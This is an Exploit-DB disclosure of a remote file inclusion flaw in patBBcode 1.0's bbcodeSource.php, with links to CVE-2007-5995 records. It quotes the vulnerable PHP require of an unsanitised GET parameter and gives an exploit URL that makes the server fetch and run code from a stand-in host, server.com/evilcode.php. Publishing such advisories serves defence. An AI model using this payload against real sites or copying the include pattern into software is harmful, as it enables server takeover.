Lucene search
P4sswdEDB-ID:4621HistoryNov 12, 2007 - 12:00 a.m.
patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion
2007-11-1200:00:00
p4sswd
www.exploit-db.com
18
Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml
Vuln file:
examples\patExampleGen\bbcodeSource.php
Vuln code:
if( !isset( $_GET['example'] ) )
die( 'No example selected.' );
$exampleId = $_GET['example'];
ob_start();
// make the example think it's still in the right place
chdir( '../' );
// include the example
require $exampleId.'.php';
ob_end_clean();
Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php
# milw0rm.com [2007-11-12]Related
prion
prion
Remote file inclusion
2007-11-15 22:46:00
cvelist
cvelist
CVE-2007-5995
2007-11-15 22:00:00
nvd
nvd
CVE-2007-5995
2007-11-15 22:46:00
cve
cve
CVE-2007-5995
2007-11-15 22:46:00